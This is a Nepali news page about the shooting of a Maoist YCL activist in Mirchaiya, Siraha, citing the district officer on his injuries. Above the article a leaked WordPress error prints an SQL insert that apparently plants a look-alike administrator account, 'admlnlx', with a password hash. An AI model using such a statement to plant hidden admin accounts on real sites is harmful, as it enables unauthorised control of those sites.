WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAJIhqzW.R5qh7RwgEQfycYFhiKpJ.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:45:48', '', 'admlnlx', 'admlnlx')
लहान ,फागुन १ –
सिराहाको मिर्चैया भन्ने ठाउँमा अज्ञात समुहले एक माओवादी कार्यकर्तामाथि गोली प्रहार गरेको छ । माओवादी केन्द्र निकट भातृ संगठन वाइसीएलका सिराहा क्षेत्र नम्बर ६ का इन्चार्ज लालु खानलाई गोली लागेको हो ।
सिराहाका प्रमुख जिल्ला अधिकारी श्रीकृष्ण श्रेष्ठका अनुसार वाइसीएल नेता खानलाई अज्ञात समुहले भरुवा बन्दुकबाट गोली हानेको थियो । खानको टाउकोमा केही छर्रा लागेको प्रमुख जिल्ला अधिकारी श्रेष्ठले जनाएका छन् ।अहिले घाइते खानको मिर्चैयाको मंगलम् अस्पतालमा उपचार भइरहेको छ । उनी खतरामुक्त रहेको पनि प्रमुख जिल्ला अधिकारी श्रेष्ठले जानकारी दिए ।